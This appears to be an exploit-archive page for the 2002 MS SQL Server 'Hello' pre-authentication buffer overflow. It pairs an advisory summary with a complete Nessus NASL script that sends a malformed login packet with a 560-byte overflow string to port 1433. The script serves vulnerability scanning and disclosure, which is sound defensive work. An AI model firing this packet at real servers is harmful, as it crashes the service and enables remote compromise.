Microsoft SQL Server 2000 - User Authentication Remote Buffer Overflow

🗓️ 06 Aug 2002 00:00:00Reported by Dave AitelType

Vulnerability in Microsoft SQL Server allows remote attackers to execute code via buffer overflow.

Reporter	Title	Published	Views	Family All 12
ATTACKERKB	CVE-2000-0402	30 May 200004:00	–	attackerkb
Circl	CVE-2000-0402	21 Dec 201000:00	–	circl
CVE	CVE-2000-0402	12 Jul 200004:00	–	cve
Cvelist	CVE-2000-0402	12 Jul 200004:00	–	cvelist
exploitpack	Microsoft SQL Server 2000 - User Authentication Remote Buffer Overflow	6 Aug 200200:00	–	exploitpack
Metasploit	Microsoft SQL Server Payload Execution	21 Feb 201201:40	–	metasploit
Metasploit	Microsoft SQL Server Payload Execution via SQL Injection	27 Jan 201116:48	–	metasploit
NVD	CVE-2000-0402	30 May 200004:00	–	nvd
Packet Storm	Microsoft SQL Server Payload Execution	26 Nov 200900:00	–	packetstorm
Packet Storm	Microsoft SQL Server Payload Execution via SQL injection	29 Jan 201100:00	–	packetstorm

source: https://www.securityfocus.com/bid/5411/info

A vulnerability has been discovered in Microsoft SQL Server that could make it possible for remote attackers to gain access to target hosts.

It is possible for an attacker to cause a buffer overflow condition on the vulnerable SQL server with a malformed login request. This may allow a remote attacker to execute arbitrary code as the SQL Server process.

This vulnerability reportedly occurs even before authentication can proceed.

##
#
# this script tests for the "You had me at hello" overflow
# in MSSQL (tcp/1433)
# Copyright Dave Aitel (2002)
# Bug found by: Dave Aitel (2002)
#
##
#TODO:
#techically we should also go to the UDP 1434 resolver service
#and get any additional ports!!!


if(description)
{
 script_id(11067);
# script_cve_id("CVE-2000-0402");
 script_version ("$Revision: 0.1 $");
 name["english"] = "Microsoft SQL Server Hello Overflow";
 script_name(english:name["english"]);
 
 desc["english"] = "
The remote MS SQL server is vulnerable to the Hello overflow.

An attacker may use this flaw to execute commands against
the remote host as LOCAL/SYSTEM, 
as well as read your database content. 

Solution : disable this service (Microsoft SQL Server).

Risk factor : High";

 script_description(english:desc["english"]);
 
 summary["english"] = "Microsoft SQL Server Hello Overflow";
 script_summary(english:summary["english"]);
 
 script_category(ACT_ATTACK);
 
 script_copyright(english:"This script is Copyright (C) 2002 Dave Aitel");
 family["english"] = "Windows";
 script_family(english:family["english"]);
 script_require_ports(1433); 
 exit(0);
}

#
# The script code starts here
#
#taken from mssql.spk
pkt_hdr = raw_string(
0x12 ,0x01 ,0x00 ,0x34 ,0x00 ,0x00 ,0x00 ,0x00  ,0x00 ,0x00 ,0x15 ,0x00 ,0x06 ,0x01 ,0x00 ,0x1b
,0x00 ,0x01 ,0x02 ,0x00 ,0x1c ,0x00 ,0x0c ,0x03  ,0x00 ,0x28 ,0x00 ,0x04 ,0xff ,0x08 ,0x00 ,0x02
,0x10 ,0x00 ,0x00 ,0x00
);

#taken from mssql.spk
pkt_tail = raw_string (
0x00 ,0x24 ,0x01 ,0x00 ,0x00
);

#techically we should also go to the UDP 1434 resolver service
#and get any additional ports!!!
port = 1433;
found = 0;
report = "The SQL Server is vulnerable to the Hello overflow.

An attacker may use this flaw to execute commands against
the remote host as LOCAL/SYSTEM,
as well as read your database content.

Solution : disable this service (Microsoft SQL Server).

Risk factor : High";


if(get_port_state(port))
{
    soc = open_sock_tcp(port);

    if(soc)
    {
    	#uncomment this to see what normally happens
        #attack_string="MSSQLServer";
	#uncomment next line to actually test for overflow
	attack_string=crap(560);
        # this creates a variable called sql_packet
	sql_packet = pkt_hdr+attack_string+pkt_tail;
	send(socket:soc, data:sql_packet);

	    r  = recv(socket:soc, length:4096);
	    close(soc);
	display ("Result:",r,"\n");
	   if(!r)
	    {
	     display("Security Hole in MSSQL\n");
            security_hole(port:port, data:report);
	    }
    }
}

06 Aug 2002 00:00Current

6.5Medium risk

Vulners AI Score6.5

CVSS 22.1

EPSS0.78483